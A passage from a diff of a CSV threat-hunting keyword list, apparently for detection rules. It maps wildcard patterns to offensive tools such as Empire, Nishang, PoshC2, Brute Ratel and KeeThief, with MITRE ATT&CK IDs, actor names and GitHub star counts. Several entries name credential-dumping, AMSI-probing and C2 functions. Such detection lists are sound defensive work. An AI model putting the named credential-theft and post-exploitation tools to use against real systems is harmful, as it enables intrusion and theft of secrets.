- T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PEHeader.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*getPositionImplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*getprivs.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getprivs.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-process *amsi.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-RBCD-Threaded*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" -"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RegistryAlwaysInstallElevated*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-RegistryAutoLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetRektBoy724/SharpUnhooker*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*Get-RemoteCachedCredential*","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteCachedCredential*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" -"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-RemoteDesktopUserSessionList.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-RemoteLocalAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteLocalAccountHash*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteMachineAccountHash*","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-RickAstley*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-RickAstley*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gets4uticket.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" -"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 